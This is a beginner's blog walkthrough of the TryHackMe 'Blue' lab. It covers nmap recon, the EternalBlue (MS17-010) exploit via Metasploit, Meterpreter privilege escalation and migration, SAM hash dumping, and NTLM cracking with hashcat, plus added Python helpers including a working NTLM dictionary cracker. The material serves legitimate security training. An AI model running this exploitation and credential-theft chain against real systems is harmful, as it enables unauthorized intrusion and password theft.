TryHackMe: Blue (Eternal Blue)
Hello there, I am a beginner in the infosec field and this is my first article on Medium, covering the “Blue” room from TryHackMe. This is the link to the room: https://tryhackme.com/room/blue
This article is written in layman’s language, as the room is intended for beginners. So, let’s get started.
First we need to connect to the TryHackMe network using a VPN (Virtual Private Network).
TryHackMe uses OpenVPN, a tool that tunnels our traffic into their internal lab network so that the target machine’s private IP becomes reachable from our attacking box.
You can learn more about this in their “OpenVPN” room.
About the vulnerability:
The name of the room is a hint about the vulnerability, and the exploit, that we will use against the machine.
EternalBlue is the exploit that the infamous WannaCry ransomware used to attack Windows systems through SMB (Server Message Block). It abuses a flaw in the SMBv1 server that Microsoft patched as MS17-010.
Fun fact: the NSA (National Security Agency) reportedly knew about this vulnerability for more than five years before it was disclosed to Microsoft.
Metasploit has a module for this exploit. It is an RCE (Remote Code Execution) bug: the SMB service on the target accepts specially crafted packets and ends up running attacker-supplied code, without any valid credentials, which compromises the whole machine.
[ TASK 1 ]: Recon
( #1 ) First we start with an nmap scan.
nmap -sC -sV -Pn <machine_ip>
- -sC = run the default NSE scripts against the open ports
- -sV = version detection (probe each open port to identify the service and its version)
- -Pn = skip host discovery and treat the host as up; Windows hosts often drop ping, so without this nmap may report the machine as down and scan nothing
( #2 )
So, as the nmap scan result shows, we have 3 open ports with a port number under 1000.
( #3 ) Now we run nmap again, this time using the NSE (Nmap Scripting Engine) vuln category to look for known vulnerabilities:
nmap --script vuln -Pn <machine_ip>
This scan reports the host as VULNERABLE under the smb-vuln-ms17-010 script, which gives us the name of the vulnerability (ms17-010) that we need for the next task.
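As an added example (not part of the original walkthrough or of TryHackMe’s material), the script below answers the two recon questions from a saved scan instead of by eyeballing the terminal: run nmap with -oX scan.xml to keep the XML, then count the open ports below 1000 and pull out every NSE script whose output reports a VULNERABLE state. The XML embedded here is a constructed, trimmed sample in the shape nmap writes; it is not the real Blue machine’s output, and 10.10.10.10 is a placeholder address.

```python
"""Count open ports below 1000 and list NSE scripts reporting VULNERABLE,
reading nmap's XML output (nmap ... -oX scan.xml).

Added example for this walkthrough; not code from the original post.
The sample XML below is constructed and trimmed to the elements we parse.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of `nmap -sV --script vuln -Pn -oX scan.xml <ip>`
# output (placeholder address 10.10.10.10; not the real machine's output).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV --script vuln -Pn -oX scan.xml 10.10.10.10">
  <host>
    <status state="up" reason="user-set"/>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open" reason="syn-ack"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="139"><state state="open" reason="syn-ack"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open" reason="syn-ack"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="8080"><state state="closed" reason="reset"/></port>
      <port protocol="tcp" portid="49154"><state state="open" reason="syn-ack"/><service name="msrpc"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="&#10;  VULNERABLE:&#10;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#10;    State: VULNERABLE"/>
      <script id="smb-vuln-ms08-067" output="&#10;  NOT VULNERABLE:&#10;    State: NOT VULNERABLE"/>
      <script id="smb-vuln-ms10-054" output="false"/>
    </hostscript>
  </host>
</nmaprun>
"""

# The vulns NSE library prints "State: VULNERABLE", "State: VULNERABLE (Exploitable)"
# or "State: LIKELY VULNERABLE" for hits, and "State: NOT VULNERABLE" for misses.
_VULN_STATE = re.compile(r"State:\s*(?:LIKELY\s+)?VULNERABLE")


def open_ports(xml_text):
    """Return sorted (port, service_name) pairs for every port nmap marked open."""
    root = ET.fromstring(xml_text)
    found = []
    for port in root.iter("port"):
        state = port.find("state")
        if state is None or state.get("state") != "open":
            continue  # closed / filtered ports are not counted
        service = port.find("service")
        name = service.get("name", "") if service is not None else ""
        found.append((int(port.get("portid")), name))
    return sorted(found)


def count_open_below(xml_text, limit=1000):
    """Task 1 question: how many open ports have a number under `limit`?"""
    return sum(1 for number, _ in open_ports(xml_text) if number < limit)


def vulnerable_scripts(xml_text):
    """Ids of NSE scripts (host- or port-level) whose output reports a vulnerable state."""
    root = ET.fromstring(xml_text)
    hits = {s.get("id") for s in root.iter("script")
            if _VULN_STATE.search(s.get("output") or "")}
    return sorted(hits)


if __name__ == "__main__":
    print("open ports:", open_ports(SAMPLE_XML))
    print("open below 1000:", count_open_below(SAMPLE_XML))
    print("vulnerable:", vulnerable_scripts(SAMPLE_XML))
```

Point the functions at the contents of your own scan.xml (open("scan.xml").read()) to get the real answers. The State: regex deliberately skips NOT VULNERABLE, which the smb-vuln scripts print when a check fails, so a plain substring search for “VULNERABLE” would produce false positives.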
[ TASK 2 ]: Gain Access
( #1 )To start Metasploit:
msfconsole
( #2 ) Now that we know the name of the vulnerability, we can search whether Metasploit has an exploit for it.
search ms17-010
In this list the EternalBlue exploit, exploit/windows/smb/ms17_010_eternalblue, appeared at index 2, so:
use 2
The index depends on your Metasploit version, so check the search output; selecting the module by its full path (use exploit/windows/smb/ms17_010_eternalblue) avoids picking the wrong one.
( #3 ) Each exploit needs certain options (parameters) to be set. To view them the command is:
show options
Now we set the options that are required but not yet filled in; the “Required” column tells us which ones (look for “yes”). RHOSTS is the target address.
set RHOSTS <machine_ip>
Check LHOST too: for a reverse-connect payload it must be your VPN address (set LHOST tun0), otherwise the target cannot connect back to you.
( #4 )After setting the required options we can now run the exploit.
exploit
( #5 ) If everything goes well, the module prints a WIN line, which means the exploit ran successfully on the machine and a session was created.
ctrl+z
Now we have a shell, but a plain command shell is limited. So we background the session (session 1) with Ctrl+Z and upgrade it to a Meterpreter shell. For this we use a payload: a payload is the code we deliver to the target and want it to execute, in this case Meterpreter, Metasploit’s feature-rich post-exploitation agent.
[ TASK 3 ]:Escalate
( #1 ) Now we upgrade our shell to a Meterpreter shell using one of the post-exploitation modules.
search shell_to_meterpreter
Metasploit returns a module (post/multi/manage/shell_to_meterpreter), which we select with the “use” command.
use 0
( #2 ) “show options” shows that we need to set the session number, i.e. the number of the shell session we just created. Usually it is the first session, but to be sure you can list sessions with the “sessions” command.
show options
set session 1
Now that all the required options are set, we are good to go! Here we use the “run” command to run the module.
run
( #3 )
( #4 )
The highlighted line in the module output indicates that we have successfully opened a second session, a Meterpreter session this time.
( #5 ) To see all the sessions we have created, use:
sessions
Now we need to interact with the second session:
sessions -i 2
( #6 )
Now we need to verify our privileges. For that we use the commands:
getsystem
getsystem tells Meterpreter to try its built-in privilege-escalation techniques (named-pipe impersonation and the like) one after another until one of them yields SYSTEM privileges.
getuid
getuid displays which user the session is running as on the host.
NT AUTHORITY\SYSTEM means you are running as the most powerful local account on that system, the Windows equivalent of root on Linux.
( #7 ) To list all the running processes:
ps
( #8 ) To migrate into another process we use the “migrate” command, giving it either a PID (Process ID) or a process name. We generally migrate into a process that already runs as NT AUTHORITY\SYSTEM, so that our session keeps those privileges and survives even if the exploited process dies. Pick a long-lived service process (a svchost.exe or spoolsv.exe, for example) rather than a critical system process whose crash would take the machine down, and use the PID your own ps output shows:
migrate -P 2740
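Choosing the PID is the part beginners get wrong, so here is an added example (not from the original post, not Metasploit code) that reads a Meterpreter ps listing and ranks the SYSTEM-owned, non-critical processes as migration targets. The ps text is a constructed sample: the PIDs, the WIN-LAB hostname and the “user” account are placeholders, not the real machine’s process list; the preferred and avoided process names are ordinary Windows service names.

```python
"""Pick a stable SYSTEM-owned process to migrate into from meterpreter's `ps` listing.

Added example for this walkthrough; not code from the original post or from
Metasploit. The `ps` text below is a constructed sample (PIDs, the WIN-LAB
hostname and the `user` account are placeholders, not the real machine).
"""
import re

SAMPLE_PS = r"""
Process List
============

 PID   PPID  Name              Arch  Session  User                          Path
 ---   ----  ----              ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System            x64   0
 416   4     smss.exe          x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 556   540   csrss.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 672   540   winlogon.exe      x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 1104  716   svchost.exe       x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 1316  716   spoolsv.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 2740  716   svchost.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 3012  2960  explorer.exe      x64   1        WIN-LAB\user                  C:\Windows\Explorer.EXE
"""

# One `ps` row: pid, ppid, name, arch, session, user (may contain single spaces),
# then at least two spaces, then the path. Rows without a user/path are skipped.
ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)\s+(x64|x86)\s+(\d+)\s+(.+?)\s{2,}(\S.*)$")

# Long-lived services that make good migration targets, best first.
PREFERRED = ("spoolsv.exe", "winlogon.exe", "lsass.exe", "svchost.exe")
# Critical processes: a crash in these bugchecks the box, so never migrate there.
AVOID = {"smss.exe", "csrss.exe", "wininit.exe", "services.exe"}


def parse_ps(text):
    """Return a dict per fully populated row of meterpreter's ps output."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        pid, ppid, name, arch, session, user, path = m.groups()
        rows.append({"pid": int(pid), "ppid": int(ppid), "name": name, "arch": arch,
                     "session": int(session), "user": user.strip(), "path": path})
    return rows


def migration_candidates(text, arch="x64"):
    """SYSTEM-owned, non-critical processes matching `arch`, best target first."""
    def rank(row):
        name = row["name"].lower()
        return (PREFERRED.index(name) if name in PREFERRED else len(PREFERRED), row["pid"])

    rows = [r for r in parse_ps(text)
            if r["user"] == r"NT AUTHORITY\SYSTEM"
            and r["name"].lower() not in AVOID
            and r["arch"] == arch]
    return [(r["pid"], r["name"]) for r in sorted(rows, key=rank)]


if __name__ == "__main__":
    for pid, name in migration_candidates(SAMPLE_PS):
        print(f"migrate -P {pid}   # {name}")
```

Paste your own ps output in place of the sample; the first candidate printed is the one to hand to migrate -P. The arch filter matters because the Meterpreter payload you landed (x64 here) should match the process you move into.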
[ TASK 4 ]:Cracking
( #1 ) Passwords in Windows are stored as hashes. Hashing is a one-way transformation of the plaintext password into a fixed-size, non-human-readable value; unlike encryption there is no key to reverse it, so the only way back is to guess candidates and compare their hashes.
hashdump is a Meterpreter command that retrieves the password hashes stored in the SAM (Security Account Manager) database, where Windows keeps its local user accounts. It needs SYSTEM privileges, which is why we escalated and migrated first. Each output line has the form user:RID:LM-hash:NT-hash:::.
hashdump
( #2 ) Windows uses NTLM (NT LAN Manager) hashes, more precisely the NT hash: an MD4 digest of the UTF-16LE encoded password, with no salt. Hashes cannot be reversed directly, but because NTLM is fast to compute and unsalted, any password present in a wordlist such as rockyou.txt can be recovered quickly with the popular cracking tool Hashcat.
apt-get install hashcat
Now copy the NT hash (the fourth colon-separated field of the hashdump line) into a file named “hashes.txt”. To crack it we must tell Hashcat the hash type: Windows NTLM is mode 1000, which you can look up in Hashcat’s help output or identify with hash-identifier.
hashcat -a 0 -m 1000 hashes.txt <location_of_the_wordlist>
-a 0 selects a straight dictionary attack and -m 1000 selects NTLM.
( OR )
We can simply use an online hash cracking website such as CrackStation. Do this only with lab hashes like these; never upload hashes from a real engagement to a third-party site.
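To make the NTLM paragraph concrete, here is an added example (not from the original post, from Metasploit or from Hashcat) that reimplements what hashcat -m 1000 computes: MD4 over the UTF-16LE password, with no salt. It parses hashdump lines, extracts the NT fields that belong in hashes.txt, and runs a small dictionary attack. The hashdump lines and the wordlist are constructed stand-ins; only the well-known test vectors (the blank LM hash, the empty-password NT hash, and the NT hash of “password”) are real values, and Administrator’s hash is a placeholder that matches nothing.

```python
"""What `hashcat -m 1000` actually computes: the NT hash is MD4 over the
UTF-16LE encoding of the password, with no salt. This reimplements MD4 in
pure Python (RFC 1320), parses hashdump lines, and runs a wordlist attack.

Added example for this walkthrough; not code from the original post, from
Metasploit or from Hashcat. The hashdump lines and the wordlist below are
constructed; only the well-known test vectors (empty password, "password",
the blank LM hash) are real values.
"""
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# (function, order of message words, per-step shifts, additive constant) per round
_ROUNDS = (
    (_f, tuple(range(16)), (3, 7, 11, 19), 0x00000000),
    (_g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
    (_h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
)


def md4(data):
    """MD4 digest (RFC 1320) of `data` as bytes."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)       # original bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, order, shifts, k in _ROUNDS:
            for i in range(16):
                a = _rotl((a + func(b, c, d) + x[order[i]] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c     # rotate registers for the next step
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def ntlm(password):
    """NT hash as the lowercase hex string hashdump prints in its fourth field."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text):
    """hashdump lines look like user:RID:LM:NT::: ; return (user, rid, lm, nt) tuples."""
    out = []
    for line in text.strip().splitlines():
        user, rid, lm, nt = line.split(":")[:4]
        out.append((user, int(rid), lm.lower(), nt.lower()))
    return out


def nt_hashes_for_hashcat(text):
    """The lines to put in hashes.txt for `hashcat -m 1000`: NT hashes only."""
    return [nt for _, _, _, nt in parse_hashdump(text)]


def crack(text, wordlist):
    """Dictionary attack: return {user: password} for every NT hash found in wordlist."""
    lookup = {ntlm(w): w for w in wordlist}       # unsalted, so hash each candidate once
    return {user: lookup[nt] for user, _, _, nt in parse_hashdump(text) if nt in lookup}


# Constructed hashdump output. Administrator's NT hash is a placeholder that
# matches nothing; Guest has the real empty-password hash; labuser is "password".
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
labuser:1000:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""
# Constructed stand-in for rockyou.txt; the empty string catches blank passwords.
WORDLIST = ["", "123456", "letmein", "qwerty", "password"]

if __name__ == "__main__":
    print(crack(SAMPLE_DUMP, WORDLIST))
```

Because the NT hash has no salt, one hash per candidate word serves every user in the dump at once, which is exactly why Hashcat gets through rockyou.txt so quickly; the aad3b435… LM field is the empty LM hash you will see on every modern Windows host and carries no password information.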
[ TASK 5 ]:Find Flags !
( #1 ) Now that we have SYSTEM rights we can traverse the whole filesystem. To find the flags we use Meterpreter’s “search” command. The pattern is a shell-style wildcard, not a regular expression: ‘*’ matches any sequence of characters, so flag*.txt matches every file whose name starts with “flag” and ends with “.txt”.
search -f flag*.txt
Now that we know the flag locations, we can move through the directories and view the files. A few commands are enough for this:
- pwd = print the current working directory
- dir = list the files in the current directory (ls works too)
- cd .. = go up one directory
- cat = view the contents of a file
( #2 )
( #3 )
With this we complete the room. I recommend trying the sequel to this room, called “Ice”.
TryHackMe has various rooms for beginners in infosec to get a strong hold on the basics and better understand the concepts by practically solving them. I recommend completing TryHackMe rooms first and then jumping to HackTheBox.
Peace!!